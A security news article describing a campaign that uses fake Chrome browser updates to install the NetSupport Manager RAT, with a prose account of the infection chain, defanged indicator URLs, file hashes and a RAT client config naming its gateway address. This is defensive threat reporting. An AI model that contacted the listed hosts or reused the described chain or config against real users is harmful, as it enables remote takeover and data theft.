Tuesday, December 24, 2024
HomeCyber AttackBeware of Fake Chrome Browser Updates that Install Malware

Beware of Fake Chrome Browser Updates that Install Malware

Published on

SIEM as a Service

Reports indicate that there seems to be an ongoing campaign that lures victims into installing a Remote Administration Tool called NetSupport Manager with fake Chrome browser updates. 

Threat actors use this remote administration software as an info stealer and to take control of the victim’s computers. Investigations point this to a suspected SocGholish campaign which was previously conducted by a Russian threat actor but still remains inconclusive.

Fake Chromium updates campaign (Source: Trellix)

However, the SVP of Trellix Advanced Research Center stated that “Chromium with 63.55% of market share is now the de facto most targeted browser for NetSupport RAT attacks, due to the global usage. Organizations need holistic global threat intelligence and innovative security solutions to get the governance and tools needed to reduce the cyber risk.”

- Advertisement - SIEM as a Service

Fake Chrome Browser Update

These fake chromium updates are spread through compromised websites which are injected with a simple HTML script tag that loads malicious JavaScript content from the C2 servers of threat actors. However, this process seems to be automated and follows a directory structure.

Further analysis showed many compromised websites with traffic from the Federal Government, Financial institutions, and consulting services. These compromised websites can be detected by checking the “/cdn-js/wds.min.php”.

Previously, threat actors used PowerShell with WMI functionality for downloading and installing the RAT. However, the current campaign uses batch files (.bat), VBscripts, and curl tools instead of PowerShell scripts for the RAT download.

When a user clicks on the fake browser update link, it downloads a ZIP archive, “UpdateInstall.zip” which consists of a malicious JS file named “Browser_portable.js” that acts as a next-stage malware downloader.

The second stage JS file is named “Chrome_update.js” which is retrieved from the C2 server of the threat actors and executed. This downloads a batch file “1.bat” in the local “C://ProgramData” folder and runs it.

In addition to this, the 1.bat drops VBScript and batch files, which are investigated to be a dummy one as they were not executed. Further components and the final batch script 2.bat is downloaded using curl commands. 

These components consist of the 7-zip archive file, which is the NetSupport Manager RAT software package and is executed by the 2.bat file.

A complete report has been published by Trellix, which provides detailed information on this campaign and the malware source code.

Indicators of Compromise

hxxps://altiordp[.]com/cdn/www.php
hxxps://cheetahsnv[.]com/cdn-js/wds.min.php
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/1.bat?964084
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/tempy.7z
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe
hxxps://ponraj[.]com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat

Files

e67f8b91555993e6315ffa9b146c759b9eeac5208116667fa4b31c717ebe5398 *1.bat 675ede331d690fff93579f9767aa7f80cfbc9d4b99afe298ba3b456ee292ac71 *2.bat c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf *7zz.exe 00cf43f66d27692f25da1771dca7bf8c3c0e5aa78b35090013b013c17ceb0fff *Chrome_update.js b9711d8d6d1fd59ea9276a70e0b37c28ae26a105c325448e5d62f7858d61b8c2 *UpdateInstaller.zip 7f976e221ece8acac5f6ea32d2ad427a9bcb237e6a6f754043265073cc004ce1 *Browser_portable.js 42679bd369a3b772c43b9ba20bf8a31a2593a360cfa2de77aa6d2023f9a0c109 *tempy.7z
Client32 config
[HTTP]
CMPI=60
GatewayAddress=5.252.178.48:443
GSK=GA;L@KDPHB Port=443
SecondaryGateway=
SecondaryPort=

Keep informed about the latest Cyber Security News by following us on GoogleNews, Linkedin, Twitter, and Facebook.

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

Node.js systeminformation Package Vulnerability Exposes Millions of Systems to RCE Attacks

A critical command injection vulnerability in the popular systeminformation npm package has recently been disclosed, exposing...

Skuld Malware Using Weaponized Windows Utilities Packages To Deliver Malware

Researchers discovered a malware campaign targeting the npm ecosystem, distributing the Skuld info stealer...

BellaCiao, A new .NET Malware With Advanced Sophisticated Techniques

An investigation revealed an intrusion in Asia involving the BellaCiao .NET malware, as the...

Malicious Apps On Amazon Appstore Records Screen And Interecpt OTP Verifications

A seemingly benign health app, "BMI CalculationVsn," was found on the Amazon App Store,...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

Node.js systeminformation Package Vulnerability Exposes Millions of Systems to RCE Attacks

A critical command injection vulnerability in the popular systeminformation npm package has recently been disclosed, exposing...

Skuld Malware Using Weaponized Windows Utilities Packages To Deliver Malware

Researchers discovered a malware campaign targeting the npm ecosystem, distributing the Skuld info stealer...

BellaCiao, A new .NET Malware With Advanced Sophisticated Techniques

An investigation revealed an intrusion in Asia involving the BellaCiao .NET malware, as the...